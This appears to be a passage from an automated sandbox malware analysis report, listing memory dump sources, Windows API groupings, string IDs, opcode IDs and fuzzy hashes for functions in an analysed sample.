                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2933794660-0
                                                                                                      • Opcode ID: 818f159f9ec60d8a3ccb8a97ee649dedb74a51f05c8d932addb4446d8bd33583
                                                                                                      • Instruction ID: dd5d42438adc3caf7441d4f493b21ae8bdceab5602bf7a6addf2789f7f91a7d9
                                                                                                      • Opcode Fuzzy Hash: 818f159f9ec60d8a3ccb8a97ee649dedb74a51f05c8d932addb4446d8bd33583
                                                                                                      • Instruction Fuzzy Hash: 9F112E22B15F0289EB40CF60E8552B837A4FB59769F440E35DBADC6BA4EF78D1548340
                                                                                                      APIs
                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C787F0AF
                                                                                                        • Part of subcall function 00007FF6C7874AA8: IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6C7874AB1
                                                                                                        • Part of subcall function 00007FF6C7874AA8: GetCurrentProcess.KERNEL32 ref: 00007FF6C7874AD6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                                                                      • String ID: PATH$\
                                                                                                      • API String ID: 4036615347-1896636505
                                                                                                      • Opcode ID: b5f7bab1f60810648718f3c02c55f217caa7c3f8a4d0087c22107651c7a4ea02
                                                                                                      • Instruction ID: 1cc9f569ac57df007544c62bbacd84233d9a4af12ea7c8a3fe7a692778b92d59
                                                                                                      • Opcode Fuzzy Hash: b5f7bab1f60810648718f3c02c55f217caa7c3f8a4d0087c22107651c7a4ea02
                                                                                                      • Instruction Fuzzy Hash: AD91DF62F1F64285FB249F6294512BD2EA16F44B9AF044835FF9F877C6CE3CA842C211
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 1791019856-0
                                                                                                      • Opcode ID: 15323dc35b5380643afaccb17bbbf6fafcd5fe42be2b6f7b592aefd2fcf5f8a7
                                                                                                      • Instruction ID: 7cb52aa57fdab4f507f338885fd4cdc68d30c1bb73407e154f6de60737a1853a
                                                                                                      • Opcode Fuzzy Hash: 15323dc35b5380643afaccb17bbbf6fafcd5fe42be2b6f7b592aefd2fcf5f8a7
                                                                                                      • Instruction Fuzzy Hash: 73618C72A0A6428AEB348F65E5802B97BB1FB94756F048236CBDED3691DF3CE451C740
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID: GetLocaleInfoEx
                                                                                                      • API String ID: 2299586839-2904428671
                                                                                                      • Opcode ID: 34e2741d719a7a770bcff6fdfcbe398c556670bf37dfd0e5683877c0dc1a574d
                                                                                                      • Instruction ID: 25773cbb31b3dcafe5f296c5f3aeb7c32d319ba09a9235bc61c34dcf4522ad40
                                                                                                      • Opcode Fuzzy Hash: 34e2741d719a7a770bcff6fdfcbe398c556670bf37dfd0e5683877c0dc1a574d
                                                                                                      • Instruction Fuzzy Hash: 1701A221B09B8196E7409F46F8400AAAF62AF95FC1F984035EF8ED7BA6CE3CD5418340
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise_clrfp
                                                                                                      • String ID:
                                                                                                      • API String ID: 15204871-0
                                                                                                      • Opcode ID: c0a8521e5f2ef04fb7a2e72cf07a7afd390bef3cd1bd9ca472db5c0cfa77226a
                                                                                                      • Instruction ID: 66240fb96fd28dc82652e2164595baed8fc8ac4e78e605f90c0136b024530e0e
                                                                                                      • Opcode Fuzzy Hash: c0a8521e5f2ef04fb7a2e72cf07a7afd390bef3cd1bd9ca472db5c0cfa77226a
                                                                                                      • Instruction Fuzzy Hash: 2BB15877A05B898AEB55CF29C8863683BA0F784B49F148932DBAD877A4CF39D451C700
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $
                                                                                                      • API String ID: 0-227171996
                                                                                                      • Opcode ID: ea54e483821b9b585bba927afcc53d8d4122b8042ca37fd65b9a449894c8b1f5
                                                                                                      • Instruction ID: c65627d794b6ecd0d456b198c59605386a22e59a84f581b636013469566dd079
                                                                                                      • Opcode Fuzzy Hash: ea54e483821b9b585bba927afcc53d8d4122b8042ca37fd65b9a449894c8b1f5
                                                                                                      • Instruction Fuzzy Hash: 81E1A432F1A64686EB688F2585501397BB0FF85B8AF145235EB9F83B94DF39E841C740
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocateErrorFreeLast_invalid_parameter_noinfo
                                                                                                      • String ID: Syst$emRo
                                                                                                      • API String ID: 3343701069-2127360862
                                                                                                      • Opcode ID: 9d07e6c32548864c38c6faaaf968178281bc58e58e2cd6ab6700fd2e8a7205e9
                                                                                                      • Instruction ID: 08c20e2bd070c57dce0ff8b8904c9e14575a3630d6467ac0b3b4c7408c0ab021
                                                                                                      • Opcode Fuzzy Hash: 9d07e6c32548864c38c6faaaf968178281bc58e58e2cd6ab6700fd2e8a7205e9
                                                                                                      • Instruction Fuzzy Hash: 53B1CF22F0A6A685FB10DF6298402BE2F95AB45B95F544532EFDE977C6DE3CE442C300
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: e+000$gfff
                                                                                                      • API String ID: 0-3030954782
                                                                                                      • Opcode ID: 48b83eaa1f7a4ed3201df91a3c56949a8b18634d0d61c8869b8135d0c886aac4
                                                                                                      • Instruction ID: f1b0e29ee7bf08f7d5dd0dc9a29fb0b48c3b84d12a619f10bad59beed1cc3908
                                                                                                      • Opcode Fuzzy Hash: 48b83eaa1f7a4ed3201df91a3c56949a8b18634d0d61c8869b8135d0c886aac4
                                                                                                      • Instruction Fuzzy Hash: 46515662B1DAC586E7248F35A802769AFD1E744B94F48C232EBEDCBAC5CE3DD4418710
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                      • String ID:
                                                                                                      • API String ID: 1010374628-0
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: Info
                                                                                                      • String ID:
                                                                                                      • API String ID: 1807457897-0
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastValue$InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 673564084-0
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3029459697-0
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$InfoLocaleValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3796814847-0
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3029459697-0
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: EnumLocalesSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 2099609381-0
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: gfffffff
                                                                                                      • API String ID: 0-1523873471
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID: 0-3916222277
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID: 0-3916222277
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: ErrorHeapLast$AllocateFree_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3806578645-0
                                                                                                      • Opcode ID: ae01cbcd46e19b36510d225b801d78826d1529799777167f2fa8e52c2dc5adf5
                                                                                                      • Instruction ID: adb8f622d29cc600aeff94b3290a4a7dcacf4be9bd767c1b50d1dc42d00247db
                                                                                                      • Opcode Fuzzy Hash: ae01cbcd46e19b36510d225b801d78826d1529799777167f2fa8e52c2dc5adf5
                                                                                                      • Instruction Fuzzy Hash: E541A821B0B64341EB705F26A86177AAEC1AF85B81F048136EFCDC7796DE3CE4018710
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HeapProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 54951025-0
                                                                                                      • Opcode ID: 34511f05812659aca80c40ff535f0d595d486bdab35c799d1182ddd21eab9e16
                                                                                                      • Instruction ID: 63280269d6bc3a27b8ae257e5cc5feae976768d92348ac1dd694a9eec5acea9c
                                                                                                      • Opcode Fuzzy Hash: 34511f05812659aca80c40ff535f0d595d486bdab35c799d1182ddd21eab9e16
                                                                                                      • Instruction Fuzzy Hash: CAB09220E07B06C2EA882F116C8A21826A46F98722F984038C28DA0360DE2C21E95700
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 16955a122a9e005663b3afd89ce6baf410ecafda8987445e36ab57d46c26df13
                                                                                                      • Instruction ID: 105d6b184a422373b8bde3f88dbfddedf78ef8958b6d9c68a4db0b86dedf34b9
                                                                                                      • Opcode Fuzzy Hash: 16955a122a9e005663b3afd89ce6baf410ecafda8987445e36ab57d46c26df13
                                                                                                      • Instruction Fuzzy Hash: 58E1A472F1A60285E7648F28815537D2BA1EB85BD5F188235EB8E87AD9CF39E841C701
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: aec7d81a3673badfc3b512a10430379540f1816e81dafed119dde0860a61ae1c
                                                                                                      • Instruction ID: 17a51cfc07ff8e0660dc9602485f80d361528aca65e3c09ee8a83043c49f664b
                                                                                                      • Opcode Fuzzy Hash: aec7d81a3673badfc3b512a10430379540f1816e81dafed119dde0860a61ae1c
                                                                                                      • Instruction Fuzzy Hash: 62C1F872B1A68687DB24CF15A04466ABBA1F794B85F448135EB8F87788DF3DE901CB40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9ca0767a17655b13b9f5db8ae47134aea554f7ca8038bb3b92b9f59afb9357b9
                                                                                                      • Instruction ID: 87cb6f5ee75823c88ae1a0b3cdb43623068de30a99989d5eaccc5071c3fcb90c
                                                                                                      • Opcode Fuzzy Hash: 9ca0767a17655b13b9f5db8ae47134aea554f7ca8038bb3b92b9f59afb9357b9
                                                                                                      • Instruction Fuzzy Hash: A2D1C422F0A64286EB688F29844427D6FA0EF85B99F144235EF8F87AD5DF3DD841D740
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastNameTranslate$CodePageValidValue_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 4023145424-0
                                                                                                      • Opcode ID: ab1a2c5c2f62adfe3e53c833f0d0289fd4dcdd9aa12b4f0d1c5d3d0eaff075e1
                                                                                                      • Instruction ID: 22ade38ca21a18a88dd5081b78c7e2167428e4771952d6b35fcd44edc80597d2
                                                                                                      • Opcode Fuzzy Hash: ab1a2c5c2f62adfe3e53c833f0d0289fd4dcdd9aa12b4f0d1c5d3d0eaff075e1
                                                                                                      • Instruction Fuzzy Hash: 05C1A426B0A68285EB609F6694107BE6BA1FB94B89F804035FFCEC7A95DF3CD545C700
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$Value_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 1500699246-0
                                                                                                      • Opcode ID: a65661641ffaa2a86b6875976da8f6003a378e863b50ef12173faae0db48d599
                                                                                                      • Instruction ID: d057e4c1fd7da55c8177febfa3f990bbf52bfb0705cfe92a8571418307d05b6e
                                                                                                      • Opcode Fuzzy Hash: a65661641ffaa2a86b6875976da8f6003a378e863b50ef12173faae0db48d599
                                                                                                      • Instruction Fuzzy Hash: A1B1E332B1A64682EB649F21D4116B93BA1FB80B9AF008136DB9DC77CADF7CE541C340
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: d0da7f92bae012dd11df3e11556849a889c26704c2b4ba3f91171b478ea459a7
                                                                                                      • Instruction ID: 8693a30ee1f9124bc46c274833e1907a7775f467df65df6aea675869a7dbb728
                                                                                                      • Opcode Fuzzy Hash: d0da7f92bae012dd11df3e11556849a889c26704c2b4ba3f91171b478ea459a7
                                                                                                      • Instruction Fuzzy Hash: 88817D32B06A5186EB64CF25D49537D2BA1FB84BA9F544636FFAE87794CF38D0418300
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 53add2fc6bebfcf2482bc093d0e7072bc3164db2d9e265f531c1659dc61df0a1
                                                                                                      • Instruction ID: fed25c5fa5396f07e0853d6b8e7f6b9d68199c7fcfe78f00ec8eabb1f89a366a
                                                                                                      • Opcode Fuzzy Hash: 53add2fc6bebfcf2482bc093d0e7072bc3164db2d9e265f531c1659dc61df0a1
                                                                                                      • Instruction Fuzzy Hash: 9481D172B0D78186E7A48F19948237AAED0FB957A4F144235EBDE87B95CE3DD4408B10
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
